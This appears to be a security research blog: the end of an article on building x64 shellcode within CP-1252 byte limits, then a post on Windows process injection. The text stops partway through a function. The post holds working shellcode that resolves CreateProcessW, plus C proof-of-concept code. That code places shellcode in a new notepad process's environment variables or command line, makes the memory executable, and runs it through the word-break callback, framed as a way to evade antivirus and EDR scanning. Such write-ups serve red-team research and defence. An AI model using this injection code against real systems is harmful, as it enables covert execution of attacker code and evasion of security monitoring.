    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\x1d\x00\xff\x00\xff" /* sbb   eax, 0xff00ff00     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    

    An idea to set EAX to -1. First, set the Carry Flag using STC, set EAX to 0xFF00FF00. Subtract 0xFF00FF00 + CF from EAX which sets EAX to 0xFFFFFFFF. Same problem as before.

    "\xf9"                 /* stc                       */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\x1d\x00\xff\x00\xff" /* sbb   eax, 0xff00ff00     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    

    This was an idea for setting EAX to 1. First, set EAX to zero. Set the Carry Flag (CF), then add CF to AL using Add with Carry (ADC). Same problem as before.

    "\x6a\x00"             /* push  0                     */
    "\x58"                 /* pop   rax                   */
    "\x00\x4d\x00"         /* add   byte [rbp], cl        */
    "\xf9"                 /* stc                         */
    "\x00\x4d\x00"         /* add   byte [rbp], cl        */
    "\x14\x00"             /* adc   al, 0                 */
    

    Another version to set EAX to -1. Store zero on the stack, load address into RAX and add 1. Rotate left by 31-bits to get 0x80000000. Load into EAX and use CDQ to set EDX to -1, then swap EAX and EDX. The problem is 0x99 converts to a double byte encoding.

    "\x6a\x00"     /* push 0                 */
    "\x54"         /* push rsp               */
    "\x00\x4d\x00" /* add  byte [rbp], cl    */
    "\x58"         /* pop  rax               */
    "\x00\x4d\x00" /* add  byte [rbp], cl    */
    "\xff\x00"     /* inc  dword [rax]       */
    "\x00\x4d\x00" /* add  byte [rbp], cl    */
    "\xc1\x00\x1f" /* rol  dword [rax], 0x1f */
    "\x00\x4d\x00" /* add  byte [rbp], cl    */
    "\x58"         /* pop  rax               */
    "\x00\x4d\x00" /* add  byte [rbp], cl    */
    "\x99"         /* cdq                    */
    "\x00\x4d\x00" /* add  byte [rbp], cl    */
    "\x92"         /* xchg eax, edx          */
    

    I examined various ways to simulate instructions and conceded it could only work using self-modifying code. The idea was to use boolean logic with bitwise instructions (AND/XOR/OR/NOT) and some arithmetic (NEG/ADD/SUB) to select the address where code execution should continue. The RET instruction is the only opcode that can be used to transfer execution. There are no JMP, Jcc or CALL instructions that can be used directly.

    If we have to modify code to simulate boolean logic, it makes more sense to just write instructions into memory and execute it there.

    "\x39\xd8"             /* cmp   eax, ebx           */
    

    There’s no simple combination of registers used with CMP or SUB that’s compatible with CP-1252. You can compare EAX with immediate values but nothing else. The following code using CMPSD attempts to demonstrate evaluating if EAX < EBX, generating a result of 0 (FALSE) or -1 (TRUE). It would have worked, except the ADD instructions before SBB generate the wrong result.

    "\x50"                 /* push  rax                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x54"                 /* push  rsp                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x5e"                 /* pop   rsi                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x53"                 /* push  rbx                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x54"                 /* push  rsp                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x5f"                 /* pop   rdi                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\xa7"                 /* cmpsd                        */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x6a\x00"             /* push  0                      */
    "\x58"                 /* pop   rax                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x1c\x00"             /* sbb   al, 0                  */
    "\x50"                 /* push  rax                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x54"                 /* push  rsp                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x58"                 /* pop   rax                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\xc1\x00\x18"         /* rol   dword ptr [rax], 0x18  */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x58"                 /* pop   rax                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x6a\x00"             /* push  0                      */
    "\x54"                 /* push  rsp                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\x5f"                 /* pop   rdi                    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\xaa"                 /* stosb                        */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\xaa"                 /* stosb                        */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\xaa"                 /* stosb                        */
    "\x00\x4d\x00"         /* add   byte [rbp], cl         */
    "\xaa"                 /* stosb                        */
    

    Load 0xFF000700 into EAX. The Carry Flag (CF) is set using SAHF. Then subtract 0xFF000700 + CF using SBB, which sets EAX to -1 or 0xFFFFFFFF.

    "\xb8\x00\x07\x00\xff" /* mov   eax, 0xff000700    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl     */
    "\x9e"                 /* sahf                     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl     */
    "\x1d\x00\x07\x00\xff" /* sbb   eax, 0xff000700    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl     */
    

    Two problems: SAHF is a byte we can’t use (0x9E) and even if we could, the ADD after the SAHF instruction modifies the flags register, resulting in EAX being set to 0 or -1. The result depends on the byte stored at the address RBP contains and the value of CL.

    Adding -1 subtracts 1 from the variable whose address RAX contains.

    "\x6a\x00"             /* push  0                    */
    "\x54"                 /* push  rsp                  */
    "\x00\x4d\x00"         /* add   byte [rbp], cl       */
    "\x58"                 /* pop   rax                  */
    "\x00\x4d\x00"         /* add   byte [rbp], cl       */
    "\x83\x00\xff"         /* add   dword  [eax], -1  */
    "\x58"                 /* pop   rax                  */
    "\x00\x4d\x00"         /* add   byte [rbp], cl       */
    

    Works fine, but because 0x83 converts to a double-byte encoding, we can’t use it.

    Set the Carry Flag (CF) with STC. Subtract 0 + CF from AL using SBB AL, 0, which sets AL to 0xFF. Create a variable set to 0 on the stack. Load the address of that variable into RDI. Store AL in the variable four times before loading it into RAX. Doesn’t work once the addition after STC is executed.

    "\xf9"                 /* stc                       */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\x1c\x00"             /* sbb   al, 0               */
    "\x6a\x00"             /* push  0                   */
    "\x54"                 /* push  rsp                 */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\x5f"                 /* pop   rdi                 */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\xaa"                 /* stosb                     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\xaa"                 /* stosb                     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\xaa"                 /* stosb                     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\xaa"                 /* stosb                     */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    "\x58"                 /* pop   rax                 */
    "\x00\x4d\x00"         /* add   byte [rbp], cl      */
    

    The next snippet simply copies the value of RCX to RAX. It’s overcomplicated, but the POP QWORD instruction might be useful in some scenario. I just didn’t find it useful.

    "\x6a\x00"             /* push  0              */
    "\x54"                 /* push  rsp            */
    "\x00\x4d\x00"         /* add   byte [rbp], cl */
    "\x58"                 /* pop   rax            */
    "\x00\x4d\x00"         /* add   byte [rbp], cl */
    "\x51"                 /* push  rcx            */
    "\x00\x4d\x00"         /* add   byte [rbp], cl */
    "\x8f\x00"             /* pop   qword [rax]    */
    "\x00\x4d\x00"         /* add   byte [rbp], cl */
    "\x5f"                 /* pop   rax            */
    

    Adding registers is a problem, specifically when a carry occurs. Any operation on a 32-bit register automatically clears the upper 32-bits of a 64-bit register, so to perform addition and subtraction on addresses, ADD and SUB of 32-bit registers isn’t useful.

        push   0
        pop    rcx
        xnop
        push   rbp              ; save rbp      
        xnop
        ; 1. ====================================
        push   0                ; store 0 as X
        push   rsp              ; store &X
        xnop
        pop    rbp              ; load &X
        xnop
        ; 2. ====================================
        mov    eax, 0xFF001200  ; load 0xFF001200
        add    [rbp], ah        ; add 0x12
        adc    al, 0            ; AL = CF
        push   rbp              ; store &X
        xnop
        push   rsp              ; store &&X
        xnop
        pop    rax              ; load &&X
        xnop
        inc    dword[rax]       ; &X++
        pop    rbp
        xnop
        add    [rbp], al        ; add CF
        ; 3. ====================================
    

    Finally, one that may or may not be useful. Imagine you have a shellcode and you want to reconstruct it in memory before executing. If the address of table 1 is in RAX, table 2 in RSI and R8 is zero, this next instruction might be useful. Every even byte of the shellcode would be stored in one table with every odd byte stored in another. Then at runtime, we combine the two. The only problem is getting R8 to zero because anything that uses it requires a REX prefix. I’m leaving it here in case R8 is already zero.

        ; read byte from table 2
        lodsb
        add [rbp], cl
        add byte[rax+r8+1], al   ; copy to table 1
        add [rbp], cl
        
        lodsb
        add [rbp], cl
        add byte[rax+r8+3], al
        add [rbp], cl
        
        lodsb
        add [rbp], cl
        add byte[rax+r8+5], al
        add [rbp], cl
        
        ; and so on..
        
        ; execute
        push rax
        ret
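
    The data flow behind the two tables can be sketched in C. This models the idea only and says nothing about register usage in the assembly. split_tables and merge_tables are hypothetical names, and I'm assuming table 1 is laid out at full size with zeros in the odd slots so that an ADD behaves like a store.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Split code into two tables: table1 keeps the even bytes in place with
   zeros at odd offsets, table2 holds the odd bytes packed together.
   table1 needs len bytes, table2 needs len / 2 bytes. */
void split_tables(const uint8_t *code, size_t len,
                  uint8_t *table1, uint8_t *table2) {
    assert(code != NULL && table1 != NULL && table2 != NULL);
    for (size_t i = 0; i < len; i++) {
        if (i & 1) {
            table1[i] = 0;
            table2[i / 2] = code[i];
        } else {
            table1[i] = code[i];
        }
    }
}

/* Merge at runtime: add each table2 byte into the matching odd slot
   of table1, which is what the ADD instructions do one byte at a time. */
void merge_tables(uint8_t *table1, size_t len, const uint8_t *table2) {
    assert(table1 != NULL && table2 != NULL);
    for (size_t i = 1; i < len; i += 2) {
        table1[i] = (uint8_t)(table1[i] + table2[i / 2]);
    }
}
```

    Splitting a buffer and merging it again should give back the original bytes, at which point table 1 holds the complete code.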
    

    Using the above instruction to add an 8-bit value to a 32-bit word.

        ; step 1
        push   rax              ; save pointer
        add    byte[rbp], cl
        add    byte[rax+r8], bl ; A[0] += B[0]
        mov    al, 0
        adc    al, 0            ; set carry
        add    byte[rbp], cl
        push   rax              ; save carry
        add    byte[rbp], cl
        pop    rcx              ; load carry into CL
        add    byte[rbp], cl
        pop    rax              ; restore pointer
        add    byte[rbp], cl
        
        ; step 2
        push   rax              ; save pointer
        add    byte[rbp], cl
        rol    dword[rax], 24   
        add    byte[rbp], cl
        add    byte[rax+r8], cl ; A[1] += CF
        mov    al, 0
        adc    al, 0            ; set carry
        add    byte[rbp], cl
        push   rax              ; save carry
        add    byte[rbp], cl
        pop    rcx              ; load carry into CL
        add    byte[rbp], cl
        pop    rax              ; restore pointer
        add    byte[rbp], cl
        
        ; step 3
        push   rax              ; save pointer
        add    byte[rbp], cl
        rol    dword[rax], 24    
        add    byte[rbp], cl
        add    byte[rax+r8], cl ; A[2] += CF
        mov    al, 0
        adc    al, 0            ; set carry
        add    byte[rbp], cl
        push   rax              ; save carry
        add    byte[rbp], cl
        pop    rcx              ; load carry into CL
        add    byte[rbp], cl
        pop    rax              ; restore pointer
        add    byte[rbp], cl
    
        ; step 4
        push   rax              ; save pointer
        add    byte[rbp], cl
        rol    dword[rax], 24    
        add    byte[rbp], cl
        add    byte[rax+r8], cl ; A[3] += CF
        mov    al, 0
        adc    al, 0            ; set carry
        add    byte[rbp], cl
        push   rax              ; save carry
        add    byte[rbp], cl
        pop    rcx              ; load carry into CL
        add    byte[rbp], cl
        pop    rax              ; restore pointer
        add    byte[rbp], cl
        
        ; step 5
        rol    dword[rax], 24
        add    byte[rbp], cl
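
    For comparison, this is roughly what those five steps compute, written as a C sketch. The names rol32 and add8_to_32 are mine, and the carry is tracked in a variable rather than recovered from the flags, so it shows the arithmetic and not the encoding constraints.

```c
#include <assert.h>
#include <stdint.h>

/* rotate a 32-bit value left by n bits (0 < n < 32) */
static uint32_t rol32(uint32_t x, unsigned n) {
    assert(n > 0 && n < 32);
    return (x << n) | (x >> (32 - n));
}

/* Add an 8-bit value to a 32-bit word one byte at a time.
   Each pass adds into the low byte, records the carry, then rotates
   left by 24 (the same as right by 8) to bring the next byte down.
   Four rotations return the word to its original orientation. */
uint32_t add8_to_32(uint32_t a, uint8_t b) {
    unsigned carry = b;                      /* first pass adds B[0] */
    for (int i = 0; i < 4; i++) {
        unsigned sum = (a & 0xFFu) + carry;  /* A[i] += carry        */
        a = (a & ~0xFFu) | (sum & 0xFFu);
        carry = sum >> 8;                    /* 0 or 1 for next byte */
        a = rol32(a, 24);
    }
    return a;                                /* carry out of A[3] is dropped */
}
```

    For example, add8_to_32(0x1234FFF0, 0x20) gives 0x12350010, the same as a normal 32-bit addition.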
    

    As you can see, it’s a mess to try to simulate instructions instead of just writing the code to memory and executing that way…or use CF_UNICODETEXT for copying to the clipboard. 😉

    Windows Process Injection: Command Line and Environment Variables

    By: odzhan
    31 July 2020 at 04:00

    Contents

    1. Introduction
    2. Shellcode
    3. Environment Variables
    4. Command Line
    5. Window Title
    6. Runtime Data

    1. Introduction

    There are many ways to load shellcode into the address space of a process, but knowing precisely where it’s stored in memory is a bigger problem when we need to execute it. Ideally, a Red Teamer will want to locate their code with the least amount of effort, avoiding memory scrapers/scanners that might alert an antivirus or EDR solution. Adam discussed some ways to avoid using VirtualAllocEx and WriteProcessMemory in a blog post, Inserting data into other processes’ address space. Red Teamers are known to create a new process before injecting data, but I’ve yet to see any examples of using the command line or environment variables to assist with this.

    This post examines how CreateProcessW might be used to both start a new process AND inject data simultaneously. The memory where the data resides initially has Read-Write (RW) permissions, but this can be changed to Read-Write-Execute (RWX) using VirtualProtectEx. Since notepad will be used to demonstrate these techniques, Wordwarping / EM_SETWORDBREAKPROC is used to execute the shellcode. The main structure of memory being modified for these examples is RTL_USER_PROCESS_PARAMETERS, which contains the Environment block, the CommandLine and C RuntimeData information, all of which can be controlled by an actor prior to creation of a new process.

    typedef struct _RTL_USER_PROCESS_PARAMETERS {
        ULONG MaximumLength;                            //0x0
        ULONG Length;                                   //0x4
        ULONG Flags;                                    //0x8
        ULONG DebugFlags;                               //0xc
        PVOID ConsoleHandle;                            //0x10
        ULONG ConsoleFlags;                             //0x18
        PVOID StandardInput;                            //0x20
        PVOID StandardOutput;                           //0x28
        PVOID StandardError;                            //0x30
        CURDIR CurrentDirectory;                        //0x38
        UNICODE_STRING DllPath;                         //0x50
        UNICODE_STRING ImagePathName;                   //0x60
        UNICODE_STRING CommandLine;                     //0x70
        PVOID Environment;                              //0x80
        ULONG StartingX;                                //0x88
        ULONG StartingY;                                //0x8c
        ULONG CountX;                                   //0x90
        ULONG CountY;                                   //0x94
        ULONG CountCharsX;                              //0x98
        ULONG CountCharsY;                              //0x9c
        ULONG FillAttribute;                            //0xa0
        ULONG WindowFlags;                              //0xa4
        ULONG ShowWindowFlags;                          //0xa8
        UNICODE_STRING WindowTitle;                     //0xb0
        UNICODE_STRING DesktopInfo;                     //0xc0
        UNICODE_STRING ShellInfo;                       //0xd0
        UNICODE_STRING RuntimeData;                     //0xe0
        RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32];  //0xf0
        ULONG EnvironmentSize;                          //0x3f0
    } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; 
    

    2. Shellcode

    User-supplied shellcodes that contain two consecutive null bytes (\x00\x00) would require an encoder and decoder, such as Base64. The following code resolves the address of CreateProcessW and executes a command supplied by the word break callback. The PoC will set the command using WM_SETTEXT.

          bits 64
          
          %include "include.inc"
          
          struc stk_mem
            .hs                   resb home_space_size
            
            .bInheritHandles      resq 1
            .dwCreationFlags      resq 1
            .lpEnvironment        resq 1
            .lpCurrentDirectory   resq 1
            .lpStartupInfo        resq 1
            .lpProcessInformation resq 1
            
            .procinfo             resb PROCESS_INFORMATION_size
            .startupinfo          resb STARTUPINFO_size
          endstruc
    
          %define stk_size ((stk_mem_size + 15) & -16) - 8
          
          %ifndef BIN
            global createproc
          %endif
          
          ; void createproc(WCHAR cmd[]);
    createproc:
          ; save non-volatile registers
          pushx  rsi, rbx, rdi, rbp
          
          ; allocate stack memory for arguments + home space
          xor    eax, eax
          mov    al, stk_size
          sub    rsp, rax
          
          ; save pointer to buffer
          push   rcx
          
          push   TEB.ProcessEnvironmentBlock
          pop    r11
          mov    rax, [gs:r11]
          mov    rax, [rax+PEB.Ldr]
          mov    rdi, [rax+PEB_LDR_DATA.InLoadOrderModuleList + LIST_ENTRY.Flink]
          jmp    scan_dll
    next_dll:    
          mov    rdi, [rdi+LDR_DATA_TABLE_ENTRY.InLoadOrderLinks + LIST_ENTRY.Flink]
    scan_dll:
          mov    rbx, [rdi+LDR_DATA_TABLE_ENTRY.DllBase]
    
          mov    esi, [rbx+IMAGE_DOS_HEADER.e_lfanew]
          add    esi, r11d             ; add 60h or TEB.ProcessEnvironmentBlock
          ; ecx = IMAGE_DATA_DIRECTORY[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress
          mov    ecx, [rbx+rsi+IMAGE_NT_HEADERS.OptionalHeader + \
                               IMAGE_OPTIONAL_HEADER.DataDirectory + \
                               IMAGE_DIRECTORY_ENTRY_EXPORT * IMAGE_DATA_DIRECTORY_size + \
                               IMAGE_DATA_DIRECTORY.VirtualAddress - \
                               TEB.ProcessEnvironmentBlock]
          jecxz  next_dll              ; if no exports, try next DLL in list
          ; rsi = &IMAGE_EXPORT_DIRECTORY.NumberOfNames
          lea    rsi, [rbx+rcx+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
          lodsd                        ; eax = NumberOfNames
          xchg   eax, ecx
          jecxz  next_dll              ; if no names, try next DLL in list
          
          ; r8 = IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
          lodsd
          xchg   eax, r8d              ;
          add    r8, rbx               ; r8 = RVA2VA(r8, rbx)
          ; ebp = IMAGE_EXPORT_DIRECTORY.AddressOfNames
          lodsd
          xchg   eax, ebp              ;
          add    rbp, rbx              ; rbp = RVA2VA(rbp, rbx)
          ; r9 = IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals      
          lodsd
          xchg   eax, r9d
          add    r9, rbx               ; r9 = RVA2VA(r9, rbx)
    find_api:
          mov    esi, [rbp+rcx*4-4]    ; esi = AddressOfNames[rcx-1]
          add    rsi, rbx
          xor    eax, eax
          cdq
    hash_api:
          lodsb
          add    edx, eax
          ror    edx, 8
          dec    al
          jns    hash_api
          cmp    edx, 0x1b929a47       ; CreateProcessW
          loopne find_api              ; loop until found or no names left
          
          jnz    next_dll              ; not found? goto next_dll
          
          movzx  eax, word[r9+rcx*2]   ; eax = AddressOfNameOrdinals[rcx]
          mov    eax, [r8+rax*4]
          add    rbx, rax              ; rbx += AddressOfFunctions[ordinal]
          
          ; CreateProcess(NULL, cmd, NULL, NULL, 
          ;   FALSE, 0, NULL, NULL, &si, &pi);
          pop    rdx           ; lpCommandLine = buffer for Edit
          xor    r8, r8        ; lpProcessAttributes = NULL
          xor    r9, r9        ; lpThreadAttributes = NULL
          xor    eax, eax
          mov    [rsp+stk_mem.bInheritHandles     ], rax ; bInheritHandles      = FALSE
          mov    [rsp+stk_mem.dwCreationFlags     ], rax ; dwCreationFlags      = 0
          mov    [rsp+stk_mem.lpEnvironment       ], rax ; lpEnvironment        = NULL
          mov    [rsp+stk_mem.lpCurrentDirectory  ], rax ; lpCurrentDirectory   = NULL
          
          lea    rdi, [rsp+stk_mem.procinfo       ]
          mov    [rsp+stk_mem.lpProcessInformation], rdi ; lpProcessInformation = &pi
    
          lea    rdi, [rsp+stk_mem.startupinfo    ]
          mov    [rsp+stk_mem.lpStartupInfo       ], rdi ; lpStartupInfo        = &si
          
          xor    ecx, ecx
          push   STARTUPINFO_size
          pop    rax
          stosd                         ; si.cb = sizeof(STARTUPINFO)
          sub    rax, 4
          xchg   eax, ecx
          rep    stosb
          call   rbx
          
          ; deallocate stack
          xor    eax, eax
          mov    al, stk_size
          add    rsp, rax
          xor    eax, eax
          
          ; restore non-volatile registers
          popx   rsi, rbx, rdi, rbp  
          ret
    

    3. Environment Variables

    Environment variables have been part of Unix since 1979 and MS-DOS/Windows since 1982. According to MSDN, the maximum size of a user-defined variable is 32,767 characters. 32KB should be sufficient for most shellcode, but if not, you have the option of using multiple variables for anything else.

    There are a few ways to inject using variables, but I found the easiest approach to be setting one in the current process with SetEnvironmentVariable, and then letting CreateProcessW propagate all of them to the new process by setting the lpEnvironment parameter to NULL.

        // generate random name
        srand(time(0));
        for(i=0; i<MAX_NAME_LEN; i++) {
          name[i] = ((rand() % 2) ? L'a' : L'A') + (rand() % 26);
        }
        
        // set variable in this process space with our shellcode
        SetEnvironmentVariable(name, (PWCHAR)WINEXEC);
        
        // create a new process using 
        // environment variables from this process
        ZeroMemory(&si, sizeof(si));
        si.cb          = sizeof(si);
        si.dwFlags     = STARTF_USESHOWWINDOW;
        si.wShowWindow = SW_SHOWDEFAULT;
        
        CreateProcess(NULL, L"notepad", NULL, NULL, 
          FALSE, 0, NULL, NULL, &si, &pi);
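
    One detail the snippet above relies on: the buffer is cast to PWCHAR and handed over as a NUL-terminated wide string, so it is copied only up to the first aligned 16-bit zero. The following is a minimal sketch of that constraint in portable C, not part of the original PoC. The helper name fits_in_env_value is hypothetical, and treating the 32,767 figure as a count that excludes the terminator is an assumption.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Limit quoted from MSDN in the text above (characters per variable). */
#define ENV_VALUE_MAX_CHARS 32767u

/*
 * Hypothetical helper: returns 1 if `buf` would be copied in full when
 * passed as a NUL-terminated UTF-16 string, 0 otherwise.
 * Assumes 16-bit code units, as on Windows.
 */
int fits_in_env_value(const uint8_t *buf, size_t len) {
    size_t i;

    assert(buf != NULL);

    /* must be a non-empty, whole number of 16-bit units */
    if (len == 0 || (len % 2) != 0) return 0;

    /* assumption: the limit counts characters and excludes the terminator */
    if (len / 2 > ENV_VALUE_MAX_CHARS) return 0;

    /* an aligned 0x0000 unit would be read as the end of the string */
    for (i = 0; i < len; i += 2) {
        if (buf[i] == 0 && buf[i + 1] == 0) return 0;
    }
    return 1;
}
```

    A buffer that fails this check would be silently truncated at the first zero unit, or would need to be split across several variables.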
    

    Variable names are stored in memory alphabetically and will appear in the same order in the new process so long as lpEnvironment for CreateProcess is set to NULL. The PoC here locates the address of the shellcode inside the current environment block, then subtracts the block's base address to obtain an offset, which the code calls the relative virtual address (RVA).

    // return the RVA of a variable's value within the environment block
    DWORD get_var_rva(PWCHAR name) {
        PVOID  env;
        PWCHAR str, var;
        DWORD  rva = 0;
        
        // find the offset of value for environment variable
        env = NtCurrentTeb()->ProcessEnvironmentBlock->ProcessParameters->Environment;
        str = (PWCHAR)env;
        
        while(*str != 0) {
          // our name?
          if(wcsncmp(str, name, MAX_NAME_LEN) == 0) {
            var = wcsstr(str, L"=") + 1;
            // calculate RVA of value
            rva = (PBYTE)var - (PBYTE)env;
            break;
          }
          // advance to next entry
          str += wcslen(str) + 1;
        }
        return rva;
    }
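
    The block layout that get_var_rva walks (a run of NUL-terminated "NAME=value" strings ending with an empty string) can be tried on a mock buffer without touching the PEB. Below is a minimal sketch in portable C; env_value_offset is a hypothetical name, and unlike the function above it also requires an '=' directly after the name, so that a shorter name cannot match the prefix of a longer one.

```c
#include <assert.h>
#include <stddef.h>
#include <wchar.h>

/*
 * Return the byte offset of NAME's value inside an environment-style block
 * ("NAME=value" strings, each NUL-terminated, closed by an empty string),
 * or 0 if NAME is not present.
 */
size_t env_value_offset(const wchar_t *block, const wchar_t *name) {
    const wchar_t *str = block;
    size_t name_len;

    assert(block != NULL && name != NULL);
    name_len = wcslen(name);

    while (*str != L'\0') {
        /* require '=' right after the name so "FOO" does not match "FOOBAR=..." */
        if (wcsncmp(str, name, name_len) == 0 && str[name_len] == L'=') {
            const wchar_t *value = str + name_len + 1;
            return (size_t)((const char *)value - (const char *)block);
        }
        /* skip this entry and its terminator */
        str += wcslen(str) + 1;
    }
    return 0;
}
```

    The result is a byte offset, so it scales with sizeof(wchar_t): 2 bytes per character on Windows, typically 4 elsewhere.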
    

    Once we have the RVA from the local process, we read the address of the environment block in the remote process and add the RVA to it.

    // get the address of environment block
    PVOID var_get_env(HANDLE hp, PDWORD envlen) {
        NTSTATUS                    nts;
        PROCESS_BASIC_INFORMATION   pbi;
        RTL_USER_PROCESS_PARAMETERS upp;
        PEB                         peb;
        ULONG                       len;
        SIZE_T                      rd;
    
        // get the address of PEB
        nts = NtQueryInformationProcess(
            hp, ProcessBasicInformation,
            &pbi, sizeof(pbi), &len);
        
        // read the PEB to get the address of RTL_USER_PROCESS_PARAMETERS
        ReadProcessMemory(
          hp, pbi.PebBaseAddress,
          &peb, sizeof(PEB), &rd);
        
        // read RTL_USER_PROCESS_PARAMETERS to get the address of the environment block
        ReadProcessMemory(
          hp, peb.ProcessParameters,
          &upp, sizeof(RTL_USER_PROCESS_PARAMETERS), &rd);
    
        *envlen = upp.EnvironmentSize;
        return upp.Environment;
    }
    

    The full routine copies the user-supplied command to the Edit control, and the shellcode receives it when the word break callback is executed. You don’t need to use Notepad, but I wanted to avoid the usual methods of executing code via RtlCreateUserThread or CreateRemoteThread. Figure 1 shows the shellcode stored as an environment variable. See var_inject.c for more details.

    Figure 1. Environment variable of new process containing shellcode.

    void var_inject(PWCHAR cmd) {
        STARTUPINFO         si;
        PROCESS_INFORMATION pi;
        WCHAR               name[MAX_PATH]={0};    
        INT                 i; 
        PVOID               va;
        DWORD               rva, old, len;
        PVOID               env;
        HWND                npw, ecw;
    
        // generate random name
        srand(time(0));
        for(i=0; i<MAX_NAME_LEN; i++) {
          name[i] = ((rand() % 2) ? L'a' : L'A') + (rand() % 26);
        }
        
        // set variable in this process space with our shellcode
        SetEnvironmentVariable(name, (PWCHAR)WINEXEC);
        
        // create a new process using 
        // environment variables from this process
        ZeroMemory(&si, sizeof(si));
        si.cb          = sizeof(si);
        si.dwFlags     = STARTF_USESHOWWINDOW;
        si.wShowWindow = SW_SHOWDEFAULT;
        
        CreateProcess(NULL, L"notepad", NULL, NULL, 
          FALSE, 0, NULL, NULL, &si, &pi);
         
        // wait for process to initialize
        // if you don't wait, there can be a race condition
        // reading the correct Environment address from new process    
        WaitForInputIdle(pi.hProcess, INFINITE);
        
        // the command to execute is just pasted into the notepad
        // edit control.
        npw = FindWindow(L"Notepad", NULL);
        ecw = FindWindowEx(npw, NULL, L"Edit", NULL);
        SendMessage(ecw, WM_SETTEXT, 0, (LPARAM)cmd);
        
        // get the address of environment block in new process
        // then calculate the address of shellcode
        env = var_get_env(pi.hProcess, &len);
        va = (PBYTE)env + get_var_rva(name);
    
        // set environment block to RWX
        VirtualProtectEx(pi.hProcess, env, 
          len, PAGE_EXECUTE_READWRITE, &old);
    
        // execute shellcode
        SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)va);
        SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
        SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);
        
    cleanup:
        // cleanup and exit
        SetEnvironmentVariable(name, NULL);
        
        if(pi.hProcess != NULL) {
          CloseHandle(pi.hThread);
          CloseHandle(pi.hProcess);
        }
    }
    

    4. Command Line

    This can be easier to work with than environment variables. For this example, the command line consists of only the shellcode itself, and it can be located easily via the PEB.

        #define NOTEPAD_PATH L"%SystemRoot%\\system32\\notepad.exe"
    
        ExpandEnvironmentStrings(NOTEPAD_PATH, path, MAX_PATH);
        
        // create a new process using shellcode as command line
        ZeroMemory(&si, sizeof(si));
        si.cb          = sizeof(si);
        si.dwFlags     = STARTF_USESHOWWINDOW;
        si.wShowWindow = SW_SHOWDEFAULT;
        
        CreateProcess(path, (PWCHAR)WINEXEC, NULL, NULL, 
          FALSE, 0, NULL, NULL, &si, &pi);
    

    Reading the command line is much the same as reading environment variables, since both reside inside RTL_USER_PROCESS_PARAMETERS.

    // get the address of command line
    PVOID get_cmdline(HANDLE hp, PDWORD cmdlen) {
        NTSTATUS                    nts;
        PROCESS_BASIC_INFORMATION   pbi;
        RTL_USER_PROCESS_PARAMETERS upp;
        PEB                         peb;
        ULONG                       len;
        SIZE_T                      rd;
    
        // get the address of PEB
        nts = NtQueryInformationProcess(
            hp, ProcessBasicInformation,
            &pbi, sizeof(pbi), &len);
        
        // read the PEB to get the address of RTL_USER_PROCESS_PARAMETERS
        ReadProcessMemory(
          hp, pbi.PebBaseAddress,
          &peb, sizeof(PEB), &rd);
        
        // read RTL_USER_PROCESS_PARAMETERS to get the address of the command line
        ReadProcessMemory(
          hp, peb.ProcessParameters,
          &upp, sizeof(RTL_USER_PROCESS_PARAMETERS), &rd);
    
        *cmdlen = upp.CommandLine.Length;
        return upp.CommandLine.Buffer;
    }
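
    Note that get_cmdline reports CommandLine.Length, and in a UNICODE_STRING that field counts bytes rather than characters and excludes the terminating NUL. The sketch below illustrates that convention with a stand-in struct so it builds without Windows headers; mock_unicode_string, ustr_char_count and ustr_from_utf16 are hypothetical names used only for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Stand-in for UNICODE_STRING so the sketch builds without Windows headers. */
typedef struct {
    uint16_t        Length;         /* bytes in use, terminator not counted */
    uint16_t        MaximumLength;  /* bytes allocated for Buffer           */
    const uint16_t *Buffer;         /* UTF-16 code units                    */
} mock_unicode_string;

/* Number of UTF-16 code units described by the string. */
size_t ustr_char_count(const mock_unicode_string *s) {
    assert(s != NULL);
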